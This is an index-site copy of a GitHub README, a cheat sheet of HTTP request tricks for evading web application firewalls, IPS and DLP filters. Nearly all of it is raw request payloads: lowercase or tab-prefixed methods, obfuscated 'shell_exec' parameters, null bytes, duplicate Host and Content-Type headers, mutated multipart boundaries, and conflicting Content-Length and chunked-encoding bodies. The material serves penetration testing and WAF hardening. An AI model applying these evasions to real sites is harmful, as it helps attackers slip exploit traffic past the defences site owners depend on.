Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet

Another way to bypass WAF Cheat Sheet (draft)
https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet

Last synced: 4 months ago
JSON representation

Another way to bypass WAF Cheat Sheet (draft)

Awesome Lists containing this project

README 

          
# WAF/IPS/DLP bypass Cheat Sheet

Another way to bypass



**Add \r\n before the first line HTTP request**  



```



GET /login HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```



**Writing the method with a lowercase (Apache)**

```

get /login HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```



**Tabs before the method (IIS)**

```

    GET /login.php HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```



**GET /login?shell_exec HTTP/1.1**

```

GET /login?shell.exec HTTP/1.1

GET /login?shell[exec HTTP/1.1

GET /login?shell%5bexec HTTP/1.1

GET /login?shell%2eexec HTTP/1.1

GET /login?shell%5fexec HTTP/1.1

GET /login?shell%20exec HTTP/1.1

```



**GET /login.php?pam_param=test3**

```

GET /login.php?pam_param=test1&pam[param=test2&pam%5bparam=test3

```



**GET /login.php?hello=world HTTP/1.1**

```

GET /login.php?hello%00another_text=world HTTP/1.1

```



**HTTP Request - absoluteURI**

```

GET http://localhost/login.php HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```



**Double host header**

```

GET /login.php HTTP/1.1

Host: favoritewaf.com

Host: localhost

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```



**Host with lowercase**

```

GET /login.php HTTP/1.1

host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```



**Host without space**

```

GET /login.php HTTP/1.1

Host:favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```

**Host with tab**

```

GET /login.php HTTP/1.1

Host:	favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```

**Host with addition symbols**



/

:

\x00

\x20

\x09

\xad (IIS)



Example:

```

GET /login.php HTTP/1.1

Host: favoritewaf.com:12345

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```



```

GET /login.php HTTP/1.1

Host: favoritewaf.com ignored.text

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

```



**Content-Type with another text** 

```

POST /login.php HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Content-Type: application/another-text/+++x-www-form-urlencoded



hello=world

```



**HTTP request with incorrect Content-Length (more data than specified)**

```

GET /login.php HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Content-Length: 1



AAAAAAAA

```



**Double Content-Type**

```

Content-Type: multipart/form-data; boundary=ZZZ

Content-Type: multipart/form-data; boundary=AAA

```



**Content-Disposition mutation**

```

GET /login.php HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)

Accept-Language: en-us

Accept-Encoding: gzip, deflate

Connection: Keep-Alive

Content-Type: multipart/form-data; boundary=--------1218108630



----------1218108630

Content-Disposition: form-data; name="hello"



world

----------1218108630--

```



```

Content-Disposition: form-data; name="hello"

Content-Disposition: form-data; name="hello

Content-Disposition: form-data; name="hello"world"

Content-Disposition: attachment; name="hello"

```



```

Content-Type: multipart/form-data; boundary=x



--x

Content-Disposition:

test1;

--x

test2;

--x--

test3;

name="hello"



world

```

**Boundary mutation**

**PHP**



```

Content-Type: multipart/form-data; myfavoriteboundaryis=X; boundary=Hello;

==

Content-Type: multipart/form-data; boundary=X;

```



**Nullbyte**

```

Content-Type: multipart/form-data; boundary=HELLO\x00XXXXXXXXX

==

Content-Type: multipart/form-data; boundary=HELLO

```



**Ignored Content-Length**

```

Content-Type: application/x-www-form-urlencoded

Content-Length: 11



hello=world

```



==

```

Content-Length: 22

Transfer-Encoding: chunked



0B

hello=world

0



```



==

```

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

Transfer-Encoding: chunked



3

hel

3

lo=

3

wor

2

ld

0

```